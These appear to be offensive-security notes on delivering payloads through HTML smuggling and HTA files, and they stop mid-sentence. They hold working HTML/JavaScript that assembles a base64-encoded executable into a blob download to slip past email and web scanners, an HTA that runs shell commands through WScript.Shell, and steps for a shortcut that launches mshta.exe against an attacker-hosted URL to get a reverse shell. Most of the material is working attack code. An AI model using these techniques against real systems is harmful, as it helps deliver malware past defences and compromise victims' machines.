Email and web scanners can parse URLs out of a message or page and act on them: the link may be removed entirely, or its content fetched and scanned in an AV sandbox. HTML smuggling sidesteps this by embedding the payload in the HTML source itself and using JavaScript to have the browser construct the download URL (a blob: URL) at runtime, so there is no payload URL in transit for the scanner to fetch.
First we create the encoded content:
echo -en "This is a smuggled file" | base64
or
cat malicious.exe | base64 -w 0; echo
Then the HTML code:
! Note that Google Chrome (and other Chromium-based browsers, including current Edge) supports window.URL.createObjectURL; the window.navigator.msSaveOrOpenBlob method makes the technique work in Internet Explorer and legacy (EdgeHTML) Microsoft Edge as well, which is why the code checks for it first.
<html>
  <head>
    <title>HTML Smuggling</title>
  </head>
  <body>
    <p>This is all the user will see...</p>
    <script>
      // Decode the base64 string into an ArrayBuffer so the Blob holds the raw
      // bytes of the file, not the base64 text.
      function convertFromBase64(base64) {
        var binary_string = window.atob(base64);
        var len = binary_string.length;
        var bytes = new Uint8Array(len);
        for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
        return bytes.buffer;
      }

      // Base64 of "This is a smuggled file" (output of the echo command above);
      // for a real payload paste the output of base64 -w 0 here.
      var file = 'VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
      var data = convertFromBase64(file);
      // application/octet-stream makes the browser save the blob rather than render it.
      var blob = new Blob([data], {type: 'application/octet-stream'});
      var fileName = 'test.txt';

      if (window.navigator.msSaveOrOpenBlob) {
        // Internet Explorer / legacy Edge
        window.navigator.msSaveOrOpenBlob(blob, fileName);
      } else {
        // Chrome, Firefox, Chromium Edge: build a blob: URL inside the browser
        // and click a hidden download link; the URL never existed on the wire.
        var a = document.createElement('a');
        document.body.appendChild(a);
        a.style = 'display: none';
        var url = window.URL.createObjectURL(blob);
        a.href = url;
        a.download = fileName;
        a.click();
        window.URL.revokeObjectURL(url);
      }
    </script>
  </body>
</html>
- HTA Files
HTA-based attacks are simple to develop and obfuscate and leave room for evasion. They bypass SmartScreen, but they face heightened detection efforts, rely on user interaction, and are easy to spot because mshta.exe appears as the parent process of whatever they launch.
An .hta file that performs a simple ping:
<html>
  <head>
    <script language="JScript">
      // mshta.exe runs the script with full Windows Script Host access, so
      // ActiveX objects such as WScript.Shell are available.
      var shell = new ActiveXObject("WScript.Shell");
      // Run an arbitrary command; point the ping at your own host to confirm execution.
      var res = shell.Run("ping -n 2 192.168.X.Y");
    </script>
  </head>
  <body>
    <script language="JScript">
      // Close the otherwise visible HTA window right away.
      self.close();
    </script>
  </body>
</html>
This is useful because we can create a shortcut file that is executed by a built-in Windows application. To create the shortcut file, right-click the desktop on the Windows machine and navigate to New -> Shortcut. In the new window, enter the MSHTA executable path (C:\Windows\System32\mshta.exe) followed by the URL of the .hta file on our Kali machine. Example: C:\Windows\System32\mshta.exe http://192.168.119.120/test.hta
Then we transfer this shortcut to our Kali machine. From there we can generate JScript code with DotNetToJScript, embed it in the .hta file, and obtain a reverse shell by sending the victim only this shortcut file.
We can also combine this shortcut with HTML smuggling to deliver the shortcut itself.
If we want, for example, an .hta file that bypasses PowerShell Constrained Language Mode (CLM) and loads a PowerShell reverse shell, we can use the following code (the binary should be first and must follow the structure of ):